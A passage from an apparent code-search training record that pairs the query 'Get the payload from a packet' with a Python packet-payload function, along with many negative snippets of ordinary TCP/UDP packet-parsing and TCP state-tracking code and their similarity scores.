exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def get_pkt(self):\n return self.pkt" ]
[ "0.7090595", "0.7003652", "0.69936156", "0.66334194", "0.65440345", "0.65436566", "0.6405004", "0.63479155", "0.6322695", "0.628168", "0.62721276", "0.6175732", "0.60703814", "0.6070341", "0.60200423", "0.60150564", "0.5997884", "0.5978716", "0.5949455", "0.59455645", "0.59366333", "0.59316623", "0.5908739", "0.5888632", "0.5815565", "0.5794967", "0.5792793", "0.5766479", "0.5745804", "0.5722134", "0.57057744", "0.5698816", "0.56907517", "0.5690084", "0.56888646", "0.5677042", "0.56718457", "0.5666656", "0.5659304", "0.5656018", "0.56387657", "0.5601895", "0.5592264", "0.5590224", "0.5581563", "0.55672514", "0.5559262", "0.5549657", "0.55482787", "0.5542988", "0.55420214", "0.55329525", "0.5529724", "0.55243784", "0.55221593", "0.55199355", "0.5512152", "0.5497053", "0.5486876", "0.5465775", "0.54639214", "0.54623127", "0.54518014", "0.54422575", "0.54361063", "0.54315746", "0.54242676", "0.542075", "0.54132926", "0.5406913", "0.5388307", "0.53863066", "0.5380853", "0.53711784", "0.5358242", "0.5358", "0.53401405", "0.5337942", "0.53310907", "0.5326487", "0.5319422", "0.53027225", "0.5301619", "0.5300135", "0.52910924", "0.5287734", "0.5276461", "0.52748907", "0.52716297", "0.52699506", "0.5264523", "0.52564454", "0.5253505", "0.52498305", "0.5247301", "0.524201", "0.5239726", "0.522892", "0.52223814", "0.52219385" ]
0.573576
29
Get the payload from a packet, the data below TCP/UDP basically
def payload_from_raw(raw, linktype=1): ip = iplayer_from_raw(raw, linktype) try: return ip.data.data except: return ""
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def get_tcp_packet_payload(pkt: dpkt.ethernet.Ethernet) -> bytes:\n eth = dpkt.ethernet.Ethernet(pkt)\n if isinstance(eth.data, dpkt.ip.IP) and isinstance(eth.data.data, dpkt.tcp.TCP):\n return eth.data.data.data", "def get_payload(raw_msg):\n\n return raw_msg[14:-6], raw_msg[-5]", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def payload(self):\n return self.raw_data[1:]", "def _icmp_parse_payload(pkt):\n\n payload = ''\n icmp_pkt = pkt.get_protocol(icmp.icmp)\n for char in icmp_pkt.data.data:\n payload+=(chr(char))\n parsed_payload = ast.literal_eval(payload.rstrip('\\0'))\n return(parsed_payload)", "def get_packet(self):\n msg_type = ''\n msg = ''\n try:\n msg_type = self.sock.recv(4)\n data = self.sock.recv(4)\n msg_len = int(struct.unpack('!L', data)[0])\n\n while len(msg) != msg_len:\n data = self.sock.recv(min(2048, msg_len - len(msg)))\n if not len(data):\n break\n msg += data\n\n if len(msg) != msg_len:\n return [None, None]\n\n except KeyboardInterrupt:\n raise\n except:\n traceback.print_exc()\n\n return Packet(type=msg_type, payload=json.loads(msg), handler=self.handler, connection=self)", "def get_tcp_packet_payload_len(pkt: dpkt.ethernet.Ethernet) -> int:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n return ip.len - (ip.hl * 4 + ip.data.off * 4)", "def recv_bundle(self):\n hdr_raw = sock_recv_raw(self.sock, 6, self.timeout)\n data_length, has_secondary = SPPPacketHeader.preparse_data_length(\n hdr_raw\n )\n data_plus_secondary = sock_recv_raw(\n self.sock,\n data_length,\n self.timeout,\n )\n packet, _ = SPPPacket.parse(\n hdr_raw + data_plus_secondary,\n timecode_used=True,\n has_crc=self.use_crc,\n )\n if self.use_crc:\n assert packet.crc_provided == packet.crc()\n return packet.payload", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def decode_payload(self, bytes):\n packets = []\n while bytes:\n if six.byte2int(bytes[0:1]) <= 1:\n packet_len = 0\n i = 1\n while six.byte2int(bytes[i:i + 1]) != 255:\n packet_len = packet_len * 10 + six.byte2int(bytes[i:i + 1])\n i += 1\n packet_start = i+1\n else:\n bytes = bytes.decode('utf-8')\n i = bytes.find(b':')\n if i == -1:\n raise ValueError('Invalid payload')\n packet_len = int(bytes[0:i])\n packet_start = i+1\n\n packet = self.decode_packet(bytes[packet_start:packet_start+packet_len])\n packets.append(packet)\n bytes = bytes[packet_start+packet_len:]\n\n return packets", "def recvData(self) -> bytes:\n \n packet = self.recvPacket()\n if(packet.seq == Rudp.ackPlusOne(self.ack)):\n self.ack = Rudp.ackPlusOne(self.ack)\n self.acknowledgePacket(packet)\n return packet.payload\n else:\n return None", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def payload_data(self, pkts):\n\n\t\t#Get all the payload bytes exchanged over MPTCP connections\n\t\tpayload_bytes = 0\n\t\tprint \"Determining the number of payload bytes excluding headers....\"\n\t\t#DSS = 0x2\n\t\tfor i in range(len(pkts)):\n\t\t\tif(TCPOption_MP in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 2 and Raw in pkts[i]):\n\t\t\t\tpayload_bytes += len(pkts[i][Raw].load)\n\t\t\t\t#print(\"DSN: %s; subflow_seqnum: %s; Data(bytes): %s\" % (pkts[i][TCPOption_MP].mptcp.dsn, pkts[i][TCPOption_MP].mptcp.subflow_seqnum, len(pkts[i][Raw].load)))\n\n\t\tprint \"Total Number of payload bytes in the file (entire MPTCP connections) excluding headers): %s\" % (payload_bytes)\n\t\t#MPTCP WITH SUBFLOW CONNECTIONS\n\t\t#MPTCP_JOINs = 0x1\n\t\tprint \"============================================================\"\n\t\tprint \"SUBFLOW Connections with their respective MPTCP connection (identified by connectionID)\"\n\t\tfor i in range(len(pkts)):\n\n\t\t\t#Initial Join Message\n\t\t\t#rcv_token Identifies the connection to which the subflow belongs: connectionID\n\t\t\tif(MPTCP_JoinSYN in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 1):\n\t\t\t\tprint(\"New subflow: connectionID: %s; src: %s; dest: %s; snd_nonce: %s\" % (pkts[i][TCPOption_MP].mptcp.rcv_token, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_nonce))\n\n\t\t#TODO: Now Need to track per-connection and per-subflow state", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def getPayload(self) -> int:\n ...", "def get_payload_length(packet):\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n return 188 - 4 - adaptation_field_len", "def getPayload(self):\n return self.__payload", "def get_udp_packet(self, sock, size=0):\n\n pkt = ''\n while True:\n buf = ''\n try:\n buf = sock.recvfrom(64)[0]\n except socket.timeout:\n break\n if size and len(pkt) >= size:\n break\n if not buf:\n break\n pkt += buf\n return pkt", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def _read_packet(self, packet_id, data_bytes):\n self._serial_conn.send_command(_SENSORS_OPCODE+\" \"+str(packet_id))\n return self._serial_conn.read_data(data_bytes)", "def recv_packet(self):\r\n self.recv_bytes()\r\n\r\n packet_length_index = 0\r\n \r\n amount_data = len(self.recvBuffer) # available amount of data to read\r\n \r\n if amount_data <= packet_length_index: # just 0's in the buffer\r\n return None\r\n\r\n if len(self.recvBuffer) <= packet_length_index + 2: # length not received\r\n return None\r\n \r\n packet_length = unpack(self.recvBuffer, packet_length_index, 'H')\r\n \r\n if packet_length > len(self.recvBuffer): # packet not fully received\r\n return None\r\n \r\n if packet_length == 0: # some wrong generated packet by server, inc position of reading packet length\r\n packet_length_index += 1\r\n return None\r\n\r\n\t\t# extract packet data\r\n packet = self.recvBuffer[packet_length_index:packet_length_index+packet_length]\r\n\r\n # remaining recv buffer\r\n self.recvBuffer = self.recvBuffer[packet_length_index + packet_length:]\r\n packet_length_index = 0 # next packet length should be at pos 0 again\r\n\r\n return packet", "def get_tcp_packet(self, sock):\n\n # the first? byte indicates the fragment status (last fragament==1?)\n # after that goes the packet size\n pkt = ''\n try:\n while True:\n psize = ''\n while True:\n psize += sock.recv(1)\n if len(psize) == 4:\n break\n p0 = psize[0]\n psize = '\\0' + psize[1:4] # remove packet number\n psize = int(struct.unpack('!I', psize)[0])\n # read actual pkt\n while True:\n pkt += sock.recv(1)\n if len(pkt) == psize:\n break\n if binascii.hexlify(p0) == '80':\n break\n except socket.timeout:\n pass\n return pkt", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def read_udp_message(socket):\n data, address = socket.recvfrom(4096)\n data = data.decode('utf-8')\n return json.loads(data), address", "def from_network_layer(buffer):\r\n packet = buffer.get_packet()\r\n # print(f'buffer.message:{buffer.message}')\r\n # if packet == None:\r\n # print(f\"[from_network_layer] packet:NULL\")\r\n print(f\"[from_network_layer] packet:{packet}\")\r\n return packet", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def readpacket(self, n):\n try:\n msg = self.sock.recv(n)\n except BaseException:\n msg = ''\n return msg", "def GetPayload(self):\n return self.__Payload", "def get_tcp_packet_payload_len_with_options(pkt: dpkt.ethernet.Ethernet) -> int:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n return ip.len - ip.hl * 4 - 20", "def _receive_packet(self):\n report = self._serial_read(1)\n if len(report) != 1:\n self.log(\"ERROR: Didn't read back a report!\")\n report = -1\n else:\n report = report[0]\n retval = self._serial_read(1)\n if len(retval) != 1:\n self.log(\"ERROR: Didn't read back a return value!\")\n retval = -1\n else:\n retval = retval[0]\n\n return_payload_len = self._serial_read(1)\n if len(return_payload_len) != 1:\n self.log(\"ERROR: Didn't read back a return payload length!\")\n return_payload_len = 0\n else:\n return_payload_len = return_payload_len[0]\n\n if return_payload_len != 0:\n return_payload = self._serial_read(return_payload_len)\n else:\n return_payload = []\n checksum = self._serial_read(1)\n if len(checksum) != 1:\n self.log(\"ERROR: Didn't read back a checksum!\")\n checksum = -1\n else:\n checksum = checksum[0]\n\n data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload\n data.append(checksum)\n\n our_checksum = self.generate_checksum(data[:-1])\n if our_checksum != checksum:\n self.log(\"ERROR: Our checksum didn't calculate properly! \"\n \"(Calculated {}, expected {})\".format(our_checksum, checksum))\n return -1, checksum, []\n else:\n if self.verbose:\n self.log(\"Checksum match! ({} == {})\".format(our_checksum, checksum))\n\n return report, retval, return_payload", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def recv(self):\r\n opcode, data = self.recv_data()\r\n return data", "def spoof_packet(packet):", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def _read_data(self, header):\n _, msg_size = unpack(self.HEADER_PACK_STR, header)\n with self.socket_lock:\n data = self.socket.recv(msg_size)\n return data", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def extract(self, packets):\n data = ''.join(data[3:63] for data in packets)\n return np.fromstring(data, 